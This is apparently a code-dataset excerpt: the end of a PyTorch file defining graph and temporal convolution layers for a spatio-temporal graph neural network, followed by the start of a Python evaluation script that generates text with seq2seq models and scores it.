act_func\r\n self.enable_gated_act_func = enable_gated_act_func\r\n self.align = Align(self.c_in, self.c_out)\r\n if self.enable_gated_act_func == True:\r\n self.causal_conv = CausalConv2d(in_channels=self.c_in, out_channels=2 * self.c_out, kernel_size=(self.Kt, 1), enable_padding=False, dilation=1)\r\n else:\r\n self.causal_conv = CausalConv2d(in_channels=self.c_in, out_channels=self.c_out, kernel_size=(self.Kt, 1), enable_padding=False, dilation=1)\r\n self.linear = nn.Linear(self.n_vertex, self.n_vertex)\r\n self.sigmoid = nn.Sigmoid()\r\n self.tanh = nn.Tanh()\r\n self.softsign = nn.Softsign()\r\n self.relu = nn.ReLU()\r\n self.softplus = nn.Softplus()\r\n self.leakyrelu = nn.LeakyReLU()\r\n self.prelu = nn.PReLU()\r\n self.elu = nn.ELU()\r\n\r\n def forward(self, x): \r\n x_in = self.align(x)[:, :, self.Kt - 1:, :]\r\n x_causal_conv = self.causal_conv(x)\r\n\r\n if self.enable_gated_act_func == True:\r\n #in the second dimension, split as half\r\n x_p = x_causal_conv[:, : self.c_out, :, :]\r\n x_q = x_causal_conv[:, -self.c_out:, :, :]\r\n\r\n # Temporal Convolution Layer (GLU)\r\n if self.act_func == \"glu\":\r\n\r\n # (x_p + x_in) ⊙ Sigmoid(x_q)\r\n x_glu = torch.mul((x_p + x_in), self.sigmoid(x_q))\r\n x_tc_out = x_glu\r\n\r\n # Temporal Convolution Layer (GTU)\r\n elif self.act_func == \"gtu\":\r\n # Tanh(x_p + x_in) ⊙ Sigmoid(x_q)\r\n x_gtu = torch.mul(self.tanh(x_p + x_in), self.sigmoid(x_q))\r\n x_tc_out = x_gtu\r\n\r\n else:\r\n raise ValueError(f'ERROR: activation function {self.act_func} is not defined.')\r\n\r\n else:\r\n\r\n # Temporal Convolution Layer (Linear)\r\n if self.act_func == \"linear\":\r\n x_linear = 
self.linear(x_causal_conv + x_in)\r\n x_tc_out = x_linear\r\n \r\n # Temporal Convolution Layer (Sigmoid)\r\n elif self.act_func == \"sigmoid\":\r\n x_sigmoid = self.sigmoid(x_causal_conv + x_in)\r\n x_tc_out = x_sigmoid\r\n\r\n # Temporal Convolution Layer (Tanh)\r\n elif self.act_func == \"tanh\":\r\n x_tanh = self.tanh(x_causal_conv + x_in)\r\n x_tc_out = x_tanh\r\n\r\n # Temporal Convolution Layer (Softsign)\r\n elif self.act_func == \"softsign\":\r\n x_softsign = self.softsign(x_causal_conv + x_in)\r\n x_tc_out = x_softsign\r\n\r\n # Temporal Convolution Layer (ReLU)\r\n elif self.act_func == \"relu\":\r\n x_relu = self.relu(x_causal_conv + x_in)\r\n x_tc_out = x_relu\r\n\r\n # Temporal Convolution Layer (Softplus)\r\n elif self.act_func == \"softplus\":\r\n x_softplus = self.softplus(x_causal_conv + x_in)\r\n x_tc_out = x_softplus\r\n \r\n # Temporal Convolution Layer (LeakyReLU)\r\n elif self.act_func == \"leakyrelu\":\r\n x_leakyrelu = self.leakyrelu(x_causal_conv + x_in)\r\n x_tc_out = x_leakyrelu\r\n\r\n # Temporal Convolution Layer (PReLU)\r\n elif self.act_func == \"prelu\":\r\n x_prelu = self.prelu(x_causal_conv + x_in)\r\n x_tc_out = x_prelu\r\n\r\n # Temporal Convolution Layer (ELU)\r\n elif self.act_func == \"elu\":\r\n x_elu = self.elu(x_causal_conv + x_in)\r\n x_tc_out = x_elu\r\n\r\n else:\r\n raise ValueError(f'ERROR: activation function {self.act_func} is not defined.')\r\n \r\n return x_tc_out\r\n\r\n\r\nclass ChebConv(nn.Module):\r\n def __init__(self, c_in, c_out, Ks, chebconv_matrix, enable_bias, graph_conv_act_func):\r\n super(ChebConv, self).__init__()\r\n self.c_in = c_in\r\n self.c_out = c_out\r\n self.Ks = Ks\r\n self.chebconv_matrix = chebconv_matrix\r\n self.enable_bias = enable_bias\r\n self.graph_conv_act_func = graph_conv_act_func\r\n self.weight = nn.Parameter(torch.FloatTensor(self.Ks, self.c_in, self.c_out))\r\n if self.enable_bias == True:\r\n self.bias = nn.Parameter(torch.FloatTensor(self.c_out))\r\n else:\r\n self.register_parameter('bias', None)\r\n self.initialize_parameters()\r\n\r\n def initialize_parameters(self):\r\n # For Sigmoid, Tanh or Softsign\r\n if self.graph_conv_act_func == 'sigmoid' or self.graph_conv_act_func == 'tanh' or self.graph_conv_act_func == 'softsign':\r\n init.xavier_uniform_(self.weight)\r\n\r\n # For ReLU, Softplus, Leaky ReLU, PReLU, or ELU\r\n elif self.graph_conv_act_func == 'relu' or self.graph_conv_act_func == 'softplus' or self.graph_conv_act_func == 'leakyrelu' \\\r\n or self.graph_conv_act_func == 'prelu' or self.graph_conv_act_func == 'elu':\r\n init.kaiming_uniform_(self.weight)\r\n\r\n if self.bias is not None:\r\n _out_feats_bias = self.bias.size(0)\r\n stdv_b = 1. 
/ math.sqrt(_out_feats_bias)\r\n init.uniform_(self.bias, -stdv_b, stdv_b)\r\n\r\n def forward(self, x):\r\n batch_size, c_in, T, n_vertex = x.shape\r\n\r\n # Using recurrence relation to reduce time complexity from O(n^2) to O(K|E|),\r\n # where K = Ks - 1\r\n x = x.reshape(n_vertex, -1)\r\n x_0 = x\r\n x_1 = torch.mm(self.chebconv_matrix, x)\r\n if self.Ks - 1 < 0:\r\n raise ValueError(f'ERROR: the graph convolution kernel size Ks must be greater than 0, but received {self.Ks}.') \r\n elif self.Ks - 1 == 0:\r\n x_list = [x_0]\r\n elif self.Ks - 1 == 1:\r\n x_list = [x_0, x_1]\r\n elif self.Ks - 1 >= 2:\r\n x_list = [x_0, x_1]\r\n for k in range(2, self.Ks):\r\n x_list.append(torch.mm(2 * self.chebconv_matrix, x_list[k - 1]) - x_list[k - 2])\r\n x_tensor = torch.stack(x_list, dim=0)\r\n\r\n x_mul = torch.mm(x_tensor.reshape(-1, self.Ks * c_in), self.weight.reshape(self.Ks * c_in, -1)).reshape(-1, self.c_out)\r\n\r\n if self.bias is not None:\r\n x_chebconv = x_mul + self.bias\r\n else:\r\n x_chebconv = x_mul\r\n \r\n return x_chebconv\r\n\r\nclass GCNConv(nn.Module):\r\n def __init__(self, c_in, c_out, gcnconv_matrix, enable_bias, graph_conv_act_func):\r\n super(GCNConv, self).__init__()\r\n self.c_in = c_in\r\n self.c_out = c_out\r\n self.gcnconv_matrix = gcnconv_matrix\r\n self.enable_bias = enable_bias\r\n self.graph_conv_act_func = graph_conv_act_func\r\n self.weight = nn.Parameter(torch.FloatTensor(self.c_in, self.c_out))\r\n if enable_bias == True:\r\n self.bias = nn.Parameter(torch.FloatTensor(self.c_out))\r\n else:\r\n self.register_parameter('bias', None)\r\n self.initialize_parameters()\r\n\r\n def initialize_parameters(self):\r\n # For Sigmoid, Tanh or Softsign\r\n if self.graph_conv_act_func == 'sigmoid' or self.graph_conv_act_func == 'tanh' or self.graph_conv_act_func == 'softsign':\r\n init.xavier_uniform_(self.weight)\r\n\r\n # For ReLU, Softplus, Leaky ReLU, PReLU, or ELU\r\n elif self.graph_conv_act_func == 'relu' or self.graph_conv_act_func == 'softplus' or self.graph_conv_act_func == 'leakyrelu' \\\r\n or self.graph_conv_act_func == 'prelu' or self.graph_conv_act_func == 'elu':\r\n init.kaiming_uniform_(self.weight)\r\n\r\n if self.bias is not None:\r\n _out_feats_bias = self.bias.size(0)\r\n stdv_b = 1. 
/ math.sqrt(_out_feats_bias)\r\n init.uniform_(self.bias, -stdv_b, stdv_b)\r\n\r\n def forward(self, x):\r\n batch_size, c_in, T, n_vertex = x.shape\r\n\r\n x_first_mul = torch.mm(x.reshape(-1, c_in), self.weight).reshape(n_vertex, -1)\r\n x_second_mul = torch.mm(self.gcnconv_matrix, x_first_mul).reshape(-1, self.c_out)\r\n\r\n if self.bias is not None:\r\n x_gcnconv_out = x_second_mul + self.bias\r\n else:\r\n x_gcnconv_out = x_second_mul\r\n \r\n return x_gcnconv_out\r\n\r\nclass GraphConvLayer(nn.Module):\r\n def __init__(self, Ks, c_in, c_out, graph_conv_type, graph_conv_matrix, graph_conv_act_func):\r\n super(GraphConvLayer, self).__init__()\r\n self.Ks = Ks\r\n self.c_in = c_in\r\n self.c_out = c_out\r\n self.align = Align(self.c_in, self.c_out)\r\n self.graph_conv_type = graph_conv_type\r\n self.graph_conv_matrix = graph_conv_matrix\r\n self.graph_conv_act_func = graph_conv_act_func\r\n self.enable_bias = True\r\n if self.graph_conv_type == \"chebconv\":\r\n self.chebconv = ChebConv(self.c_out, self.c_out, self.Ks, self.graph_conv_matrix, self.enable_bias, self.graph_conv_act_func)\r\n elif self.graph_conv_type == \"gcnconv\":\r\n self.gcnconv = GCNConv(self.c_out, self.c_out, self.graph_conv_matrix, self.enable_bias, self.graph_conv_act_func)\r\n\r\n def forward(self, x):\r\n x_gc_in = self.align(x)\r\n batch_size, c_in, T, n_vertex = x_gc_in.shape\r\n if self.graph_conv_type == \"chebconv\":\r\n x_gc = self.chebconv(x_gc_in)\r\n elif self.graph_conv_type == \"gcnconv\":\r\n x_gc = self.gcnconv(x_gc_in)\r\n x_gc_with_rc = torch.add(x_gc.reshape(batch_size, self.c_out, T, n_vertex), x_gc_in)\r\n x_gc_out = x_gc_with_rc\r\n return x_gc_out\r\n\r\nclass STConvBlock(nn.Module):\r\n # STConv Block contains 'TGTND' structure\r\n # T: Gated Temporal Convolution Layer (GLU or GTU)\r\n # G: Graph Convolution Layer (ChebConv or GCNConv)\r\n # T: Gated Temporal Convolution Layer (GLU or GTU)\r\n # N: Layer Normolization\r\n # D: Dropout\r\n\r\n def __init__(self, Kt, Ks, n_vertex, last_block_channel, channels, gated_act_func, graph_conv_type, graph_conv_matrix, drop_rate):\r\n super(STConvBlock, self).__init__()\r\n self.Kt = Kt\r\n self.Ks = Ks\r\n self.n_vertex = n_vertex\r\n self.last_block_channel = last_block_channel\r\n self.channels = channels\r\n self.gated_act_func = gated_act_func\r\n self.enable_gated_act_func = True\r\n self.graph_conv_type = graph_conv_type\r\n self.graph_conv_matrix = graph_conv_matrix\r\n self.graph_conv_act_func = 'relu'\r\n self.drop_rate = drop_rate\r\n self.tmp_conv1 = TemporalConvLayer(self.Kt, self.last_block_channel, self.channels[0], self.n_vertex, self.gated_act_func, self.enable_gated_act_func)\r\n self.graph_conv = GraphConvLayer(self.Ks, self.channels[0], self.channels[1], self.graph_conv_type, self.graph_conv_matrix, self.graph_conv_act_func)\r\n self.tmp_conv2 = TemporalConvLayer(self.Kt, self.channels[1], self.channels[2], self.n_vertex, self.gated_act_func, self.enable_gated_act_func)\r\n self.tc2_ln = nn.LayerNorm([self.n_vertex, self.channels[2]])\r\n self.sigmoid = nn.Sigmoid()\r\n self.tanh = nn.Tanh()\r\n self.relu = nn.ReLU()\r\n self.softplus = nn.Softplus()\r\n self.leakyrelu = nn.LeakyReLU()\r\n self.prelu = nn.PReLU()\r\n self.elu = nn.ELU()\r\n self.do = nn.Dropout(p=self.drop_rate)\r\n\r\n def forward(self, x):\r\n x_tmp_conv1 = self.tmp_conv1(x)\r\n x_graph_conv = self.graph_conv(x_tmp_conv1)\r\n if self.graph_conv_act_func == 'sigmoid':\r\n x_act_func = self.sigmoid(x_graph_conv)\r\n elif self.graph_conv_act_func == 'tanh':\r\n 
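            # caveat: graph_conv_act_func is hardcoded to 'relu' in __init__, and
            # the 'softsign' branch below would raise AttributeError, since
            # STConvBlock (unlike OutputBlock) never defines self.softsign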
x_act_func = self.tanh(x_graph_conv)\r\n elif self.graph_conv_act_func == 'softsign':\r\n x_act_func = self.softsign(x_graph_conv)\r\n elif self.graph_conv_act_func == 'relu':\r\n x_act_func = self.relu(x_graph_conv)\r\n elif self.graph_conv_act_func == 'softplus':\r\n x_act_func = self.softplus(x_graph_conv)\r\n elif self.graph_conv_act_func == 'leakyrelu':\r\n x_act_func = self.leakyrelu(x_graph_conv)\r\n elif self.graph_conv_act_func == 'prelu':\r\n x_act_func = self.prelu(x_graph_conv)\r\n elif self.graph_conv_act_func == 'elu':\r\n x_act_func = self.elu(x_graph_conv)\r\n x_tmp_conv2 = self.tmp_conv2(x_act_func)\r\n x_tc2_ln = self.tc2_ln(x_tmp_conv2.permute(0, 2, 3, 1)).permute(0, 3, 1, 2)\r\n x_do = self.do(x_tc2_ln)\r\n x_st_conv_out = x_do\r\n return x_st_conv_out\r\n\r\nclass OutputBlock(nn.Module):\r\n # Output block contains 'TNFF' structure\r\n # T: Gated Temporal Convolution Layer (GLU or GTU)\r\n # N: Layer Normolization\r\n # F: Fully-Connected Layer\r\n # F: Fully-Connected Layer\r\n\r\n def __init__(self, Ko, last_block_channel, channels, end_channel, n_vertex, gated_act_func, drop_rate):\r\n super(OutputBlock, self).__init__()\r\n self.Ko = Ko\r\n self.last_block_channel = last_block_channel\r\n self.channels = channels\r\n self.end_channel = end_channel\r\n self.n_vertex = n_vertex\r\n self.gated_act_func = gated_act_func\r\n self.enable_gated_act_func = True\r\n self.drop_rate = drop_rate\r\n self.tmp_conv1 = TemporalConvLayer(self.Ko, self.last_block_channel, self.channels[0], self.n_vertex, self.gated_act_func, self.enable_gated_act_func)\r\n self.fc1 = nn.Linear(self.channels[0], self.channels[1])\r\n self.fc2 = nn.Linear(self.channels[1], self.end_channel)\r\n self.tc1_ln = nn.LayerNorm([self.n_vertex, self.channels[0]])\r\n self.act_func = 'sigmoid'\r\n self.sigmoid = nn.Sigmoid()\r\n self.tanh = nn.Tanh()\r\n self.softsign = nn.Softsign()\r\n self.relu = nn.ReLU()\r\n self.softplus = nn.Softplus()\r\n self.leakyrelu = nn.LeakyReLU()\r\n self.prelu = nn.PReLU()\r\n self.elu = nn.ELU()\r\n self.do = nn.Dropout(p=self.drop_rate)\r\n\r\n def forward(self, x):\r\n x_tc1 = self.tmp_conv1(x)\r\n x_tc1_ln = self.tc1_ln(x_tc1.permute(0, 2, 3, 1))\r\n x_fc1 = self.fc1(x_tc1_ln)\r\n if self.act_func == 'sigmoid':\r\n x_act_func = self.sigmoid(x_fc1)\r\n elif self.act_func == 'tanh':\r\n x_act_func = self.tanh(x_fc1)\r\n elif self.act_func == 'softsign':\r\n x_act_func = self.softsign(x_fc1)\r\n elif self.act_func == 'relu':\r\n x_act_func = self.relu(x_fc1)\r\n elif self.act_func == 'softplus':\r\n x_act_func = self.softplus(x_fc1)\r\n elif self.act_func == 'leakyrelu':\r\n x_act_func = self.leakyrelu(x_fc1)\r\n elif self.act_func == 'prelu':\r\n x_act_func = self.prelu(x_fc1)\r\n elif self.act_func == 'elu':\r\n x_act_func = self.elu(x_fc1)\r\n x_fc2 = self.fc2(x_act_func).permute(0, 3, 1, 2)\r\n x_out = x_fc2\r\n return x_out\r\n","repo_name":"sxgcase/dynGNN","sub_path":"model/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":18263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33203335956","text":"\nfrom itertools import islice\nfrom comet.train.common import *\nimport comet.train.mylogs as mylogs \nimport nltk\nimport math\nfrom nltk.tokenize import word_tokenize\nfrom comet.transformers_ptuning import PTuningWrapper\nfrom nltk.translate.bleu_score import SmoothingFunction, sentence_bleu\nfrom sentence_transformers import SentenceTransformer, util\nfrom sentence_transformers import 
CrossEncoder\nfrom sklearn.metrics import f1_score\nfrom rouge import Rouge\n#%% Aggregate instances of queries and corresponding responses\n# (str)split_name -> (dict) query -> (list) response \n\nfrom datasets import load_metric\nimport nltk\n\n\ndef forward_step(model, batch, no_model_batch, accumulation_tiny_steps=1, mode=\"train\", task_ids=None):\n for k in no_model_batch:\n if k not in [\"resp\", \"query\", \"target\", \"wrap\", \"freeze\", \"unfreeze\", \"method\", \"task\"]:\n no_model_batch[k] = no_model_batch[k].to(device)\n #if task_ids is not None:\n # result = model.forward(task_ids, add_prior=True, **batch)\n #else:\n result = model(**batch)\n logits = result[\"logits\"]\n forw_out = {\n \"logits\": logits\n }\n if \"loss\" in result: # and not \"loss_mask\" in no_model_batch:\n loss = result['loss']/accumulation_tiny_steps\n else:\n losses = torch.nn.functional.cross_entropy(\n result['logits'].reshape(-1,result['logits'].size(2)),\n no_model_batch['labels'].reshape(-1,),\n reduction='none'\n ).reshape(result['logits'].size(0),-1)\n if \"loss_mask\" in no_model_batch:\n loss_mask = no_model_batch[\"loss_mask\"]\n #loss_mask = loss_mask.to(device)\n losses = (losses * loss_mask).sum(-1) / loss_mask.sum(-1)\n loss = losses.mean()\n else:\n loss = losses.mean()\n forw_out[\"loss_batch\"] = losses\n\n forw_out[\"loss\"] = loss\n\n return forw_out\n\n\ndef evaluate1(tokenizer, eval_data_loader, model, device, seed =0, mode=\"dev\", save_path=\"\", wrap=True, task_ids=None):\n \"\"\"Evaluation.\"\"\"\n # Turn on evaluation mode which disables dropout.\n model.eval()\n\n total_loss = 0.0\n step = 0\n #set_random_seed(seed)\n\n all_idx = []\n all_preds = []\n all_labels = []\n all_gens = []\n all_resps = []\n all_queries = []\n gen_model = model\n if isinstance(model, PTuningWrapper): \n gen_model = model.underlying_model \n with torch.no_grad():\n for model_batch, no_model_batch in eval_data_loader:\n for k in model_batch:\n model_batch[k] = model_batch[k].to(device)\n for k in no_model_batch:\n if k not in [\"resp\", \"query\", \"target\", \"wrap\", \"freeze\", \"unfreeze\", \"method\"]:\n no_model_batch[k] = no_model_batch[k].to(device)\n\n decs = generate(gen_model, tokenizer, model_batch, task_ids)\n all_gens.extend(decs)\n\n forw_out = forward_step(model, model_batch, no_model_batch, mode=\"test\")\n loss = forw_out[\"loss\"].item() if \"loss\" in forw_out else 0\n total_loss += loss\n\n logits_list = forw_out[\"logits\"]\n seq_len = logits_list.size()[1]\n seq_preds = []\n for i in range(seq_len):\n pred_token_logits = logits_list[:, i, :]\n preds = torch.argmax(pred_token_logits, dim=-1)\n seq_preds.append(preds.tolist())\n _seq_preds = list(zip(*seq_preds))\n all_preds.extend(_seq_preds)\n\n if \"idx\" in no_model_batch: \n gathered_idx = no_model_batch[\"idx\"]\n all_idx.extend(gathered_idx)\n\n #labels = no_model_batch[\"labels\"][:, 1]\n # my code\n labels = model_batch[\"labels\"]#[:, 1]\n gathered_labels = labels.tolist() \n all_labels.extend(gathered_labels)\n\n all_queries.extend(no_model_batch[\"query\"])\n all_resps.extend(no_model_batch[\"resp\"])\n\n step += 1\n\n total_loss /= step\n\n #all_idx = torch.cat(all_idx, dim=0).cpu().tolist()\n #all_preds = torch.cat(all_preds, dim=0).cpu().tolist()\n #all_labels = torch.cat(all_labels, dim=0).cpu().tolist()\n preds_decs = []\n for p in all_preds:\n dec = tokenizer.convert_ids_to_tokens(p)\n preds_decs.append(dec)\n labels_decs = []\n for l in all_labels:\n l = [0 if x == -100 else x for x in l] \n dec = 
tokenizer.convert_ids_to_tokens(l)\n labels_decs.append(dec)\n _preds = []\n _labels = []\n _gens = []\n c = 0\n i = 0\n inps = 0\n inp = \"\"\n rows = []\n for p,l,r, g, q in zip(preds_decs, labels_decs, all_resps, all_gens, all_queries):\n _gens.append(g)\n _preds.append(p[1].lower())\n _labels.append(l[1].lower())\n resp = re.sub(r'<.*?>','', r)\n resp = resp.strip()\n if q != inp:\n inps +=1\n inp = q\n dd = {\"top\": resp, \"top_pred\": g}\n rows.append(dd)\n print(\"-\"*80)\n print(\"{}) {}\".format(i, q))\n print(\"\")\n if any(x in resp.split() for x in g.split()):\n c +=1\n print(\" \"*10,\"True:\",r, \" | \", resp)\n print(\" \"*10,\"Pred:\",p)\n print(\" \"*10,\"Gen:\",g)\n i += 1\n acc1 = c/i\n acc2 = c/inps\n print(\"{:.2f} = {}/{} | {:.2f} = {}/{}\".format(acc1,c,i, acc2, c, inps))\n batch = pd.DataFrame(data=rows)\n batch.to_csv(os.path.join(save_path, \"{:.3f}\".format(acc1)+\".tsv\"), sep=\"\\t\", index=False)\n #st_score = run_sts_benchmark(batch, st_embed)\n metric_list = [\"rouge\", \"meteor\", \"bertscore\"]\n metric_list = [\"bertscore\"]\n #summary = calc_metrics(batch[\"top_pred\"].tolist(), batch[\"top\"].tolist(), metric_list)\n bscore = 0.0 #summary[\"bertscore_f1\"]\n #eval_metric = acc_f1_metric\n eval_metric = acc_metric\n res = eval_metric(tokenizer, _preds, _labels, save_path=save_path)\n print(res)\n\n return acc1, acc2, bscore, total_loss \n\n\n\n\n# the code below refers to the https://github.com/Yale-LILY/FeTaQA/blob/main/end2end/train.py\ndef postprocess_text(preds, labels, metric_name):\n preds = [pred.strip() for pred in preds]\n labels = [label.strip() for label in labels]\n\n # rougeLSum expects newline after each sentence\n if metric_name == \"rouge\":\n preds = [\"\\n\".join(nltk.sent_tokenize(pred)) for pred in preds]\n labels = [\"\\n\".join(nltk.sent_tokenize(label)) for label in labels]\n elif metric_name == \"sacrebleu\": # sacrebleu\n labels = [[label] for label in labels]\n elif metric_name == \"bleu\":\n preds = [pred.split(' ') for pred in preds]\n labels = [[label.split(' ')] for label in labels]\n else:\n pass\n\n return preds, labels\n\ndevice = \"cpu\"\ndef set_device(dev):\n global device\n device = dev\n\n\nfrom nltk import word_tokenize, pos_tag\nfrom nltk.corpus import wordnet\n\nlemmatizer = nltk.WordNetLemmatizer()\n#nltk.download('averaged_perceptron_tagger')\n#word tokenizeing and part-of-speech tagger\ndef get_verb(document):\n tokens = [nltk.word_tokenize(sent) for sent in [document]]\n postag = [nltk.pos_tag(sent) for sent in tokens][0]\n for item in postag:\n w,t = item\n if t in [\"V\",\"VB\", \"VBD\"]:\n return w\n return \"\"\n\ndef trim_batch(\n input_ids, pad_token_id, attention_mask=None,\n):\n \"\"\"Remove columns that are populated exclusively by pad_token_id\"\"\"\n keep_column_mask = input_ids.ne(pad_token_id).any(dim=0)\n if attention_mask is None:\n return input_ids[:, keep_column_mask]\n else:\n return (input_ids[:, keep_column_mask], attention_mask[:, keep_column_mask])\n\ndef generate(model, tokenizer, batch, gen_token = \"\", gen_param = \"greedy\", at_mask=None, task_ids=None):\n skip_special = \"True\"\n #verb = get_verb(query)\n #vlog.info(\"Ignoring verb %s\", verb)\n bad_words_ids = None\n #extra_id_0 = tokenizer.convert_tokens_to_ids([\"\"])[0]\n #if verb:\n # bad_words_ids = tokenizer(verb).input_ids\n if \"@\" in gen_param:\n gen_param, skip_special = gen_param.split(\"@\")\n if gen_param == \"greedy\":\n gen_kwargs = {\n \"max_length\":40,\n \"num_beams\":5,\n \"repetition_penalty\":5.5,\n 
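            # note: despite the "greedy" label, these settings run 5-beam search
            # with a strong repetition penalty and return a single sequence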
\"num_return_sequences\":1,\n \"bad_words_ids\": bad_words_ids\n }\n elif gen_param == \"top_p\" or gen_param == \"top_k\":\n gen_kwargs = {\n \"max_length\":40,\n \"do_sample\":True, \n \"top_p\":0.9, \n \"top_k\":10,\n \"num_beams\":5,\n \"temperature\": 1.0,\n \"num_return_sequences\":1, \n \"repetition_penalty\":5.5,\n \"bad_words_ids\": bad_words_ids\n }\n #batch.to(device)\n #if \"labels\" in batch:\n # gen_kwargs[\"labels\"] = batch[\"labels\"]\n if \"description_input_ids\" in batch:\n gen_kwargs[\"description_input_ids\"] = batch[\"description_input_ids\"]\n if \"description_attention_mask\" in batch:\n gen_kwargs[\"description_attention_mask\"] = batch[\"description_attention_mask\"]\n if \"knowledge_input_ids\" in batch:\n gen_kwargs[\"knowledge_input_ids\"] = batch[\"knowledge_input_ids\"]\n if \"knowledge_attention_mask\" in batch:\n gen_kwargs[\"knowledge_attention_mask\"] = batch[\"knowledge_attention_mask\"]\n if \"task\" in batch and mylogs.args(\"stype\") == \"atm\":\n gen_kwargs[\"task\"] = batch[\"task\"]\n\n input_batch = {}\n input_batch[\"input_ids\"] = batch[\"input_ids\"]\n input_batch[\"attention_mask\"] = batch[\"attention_mask\"]\n input_ids, attention_mask = trim_batch(**input_batch, pad_token_id=tokenizer.pad_token_id)\n decs = []\n input_ids = input_ids.to(device)\n attention_mask = attention_mask.to(device)\n if False: #gen_token != \"\":\n gen_token_id = tokenizer.convert_tokens_to_ids(gen_token)\n hyps = model.generate(\n input_ids,\n attention_mask=attention_mask,\n **gen_kwargs,\n decoder_start_token_id=gen_token_id)\n hyps = tokenizer.batch_decode(hyps,skip_special_tokens=False)\n else:\n #breakpoint()\n if False: #task_ids is not None:\n hyps = model.generate(task_ids, \n input_ids=input_ids,\n attention_mask=attention_mask,\n **gen_kwargs,\n )\n else:\n hyps = model.generate(\n input_ids=input_ids,\n attention_mask=attention_mask,\n **gen_kwargs,\n )\n hyps = tokenizer.batch_decode(hyps,skip_special_tokens=skip_special == \"True\")\n decs.extend(hyps)\n return decs\n# ggggggggg\ndef batch_generate(model, tokenizer, queries, batch_size=5, gen_token = \"\", gen_param = \"greedy\", at_mask=None):\n skip_special = \"True\"\n #verb = get_verb(query)\n #vlog.info(\"Ignoring verb %s\", verb)\n bad_words_ids = None\n #if verb:\n # bad_words_ids = tokenizer(verb).input_ids\n if \"@\" in gen_param:\n gen_param, skip_special = gen_param.split(\"@\")\n if gen_param == \"greedy\":\n gen_kwargs = {\n \"max_length\":160,\n \"num_beams\":5,\n \"repetition_penalty\":5.5,\n \"num_return_sequences\":1,\n \"bad_words_ids\": bad_words_ids\n }\n else: #if gen_param == \"top_p\":\n gen_kwargs = {\n \"max_length\":160,\n \"do_sample\":True, \n \"top_p\":0.9, \n \"top_k\":10,\n \"num_beams\":5,\n \"temperature\": 1.0,\n \"num_return_sequences\":1, \n \"repetition_penalty\":5.5,\n \"bad_words_ids\": bad_words_ids\n }\n gen_kwargs[\"task\"] = 0 #batch[\"task\"]\n with torch.no_grad():\n examples = queries\n decs = []\n for batch in list(chunks(queries, batch_size)):\n batch = tokenizer(batch, return_tensors=\"pt\", max_length=200, truncation=True, padding=True).to(device)\n input_ids, attention_mask = trim_batch(**batch, pad_token_id=tokenizer.pad_token_id)\n\n if False: #gen_token != \"\":\n gen_token_id = tokenizer.convert_tokens_to_ids(gen_token)\n hyps = model.generate(input_ids=input_ids,**gen_kwargs,\n attention_mask=attention_mask,\n decoder_start_token_id=gen_token_id)\n hyps = tokenizer.batch_decode(hyps,skip_special_tokens=False)\n else:\n hyps = 
model.generate(input_ids=input_ids,**gen_kwargs,\n attention_mask=attention_mask)\n hyps = tokenizer.batch_decode(hyps,skip_special_tokens=skip_special == \"True\")\n decs.extend(hyps)\n return decs\n\ndef bert_score(bert_scorer, hyps, refs):\n if bert_scorer == None:\n return 0, 0, 0.0\n\n hyps = [p.strip() for p in hyps]\n refs = [g.strip() for g in refs]\n\n embeddings1 = bert_scorer.encode(hyps, device=device, convert_to_tensor=True)\n embeddings2 = bert_scorer.encode(refs, device=device, convert_to_tensor=True)\n\n #Compute cosine-similarities for each sentence with each other sentence\n cosine_scores = util.pytorch_cos_sim(embeddings1, embeddings2)\n\n #Find the pairs with the highest cosine similarity scores\n pairs = []\n rows = cosine_scores.shape[0]\n cols = cosine_scores.shape[1]\n for i in range(rows):\n for j in range(cols):\n pairs.append({'index': [i, j], 'score': cosine_scores[i][j]})\n #logging.info({'index': [i, j], 'score': cosine_scores[i][j]})\n\n #Sort scores in decreasing order\n pairs = sorted(pairs, key=lambda x: x['score'], reverse=True)\n\n top = pairs[0]\n best_hyp_index = top[\"index\"][0]\n best_ref_index = top[\"index\"][1]\n\n return best_hyp_index, best_ref_index, top[\"score\"] \n\n# ################################### Evaluation #########################\ndef chunks(lst, n):\n \"\"\"Yield successive n-sized chunks from lst.\"\"\"\n for i in range(0, len(lst), n):\n yield lst[i : i + n]\n\nimport debugpy\n# vvvvvvvvvvvvvvv\n\ndef evaluate(test_set, dataloader, save_path, exp_info, val_records = 1, gen_param=\"greedy\", scorers=\"rouge\", batch_size=\"20@5\", model = None, tokenizer = None, preds_file = \"\", set_name = \"test\", rewrite_info = False, stop_level=0, seed=0, task_ids=None): \n if rewrite_info:\n save_path = os.path.join(save_path, \"full_results.tsv\")\n if Path(save_path).is_file() and rewrite:\n df = pd.read_table(save_path)\n\n for key, info in exp_info.items():\n df[key] = info\n\n mlog.info(\"Saving results %s\", save_path)\n df.to_csv(save_path, index=False, sep=\"\\t\")\n return\n\n\n mlog.info(\"Loading models for evaluation ..\")\n mlog.info(\"%s\", save_path)\n #set_random_seed(seed)\n\n #local_path = f\"{base_path}/paraphrase-multilingual-MiniLM-L12-v2\" \n #df = df.groupby(['prefix','input_text'],as_index=False)[target].agg({\"target_text\":'
'.join})\n #resp_cost_toks = re.split(\"{.*}\", anstemp)\n resp_cost_toks = [\"\",\"\", \"\", \"\", \"\", \".\"]\n if model is not None: model.eval()\n rows = []\n sel_rows = []\n mlog.info(\"Scoring...\")\n pbar = tqdm(total=len(test_set), position=0, leave=True) #,dynamic_ncols=True)\n step = 0\n if \"@\" in batch_size:\n bs, gen_bs = batch_size.split(\"@\")\n else:\n bs = batch_size\n gen_bs = max(2, bs - 5)\n bs = int(bs)\n gen_bs = int(gen_bs)\n vlog.disabled = True\n exit_loop = False\n nones = 0\n lang = \"en2en\"\n sel_inps = {}\n if preds_file:\n mlog.info(\"extention %s, %s\", preds_file, Path(preds_file).suffix) \n if Path(preds_file).suffix == \".json\":\n with open(preds_file) as json_file:\n records = json.load(json_file)\n lines = []\n test_set = []\n for item in records:\n d = (item[\"text_in\"], item[\"question\"], item[\"answer_text\"], item[\"meta\"],item[\"id\"], 0)\n test_set.append(d)\n lines.append(item[\"prediction\"])\n else:\n with open(preds_file, 'r') as infile:\n lines = infile.readlines()\n lines = lines[1:]\n l_count = 0\n ignore_special_tokens = False\n if \"@\" in gen_param:\n _, ist = gen_param.split(\"@\")\n ignore_special_tokens = ist == \"True\"\n test_iter = iter(test_set)\n bs = 2\n batches = batched(list(test_iter), bs)\n if model is not None and dataloader is not None:\n dl_iter = iter(dataloader)\n iid = 0\n old_query = \"\"\n for batch_list in batches: \n 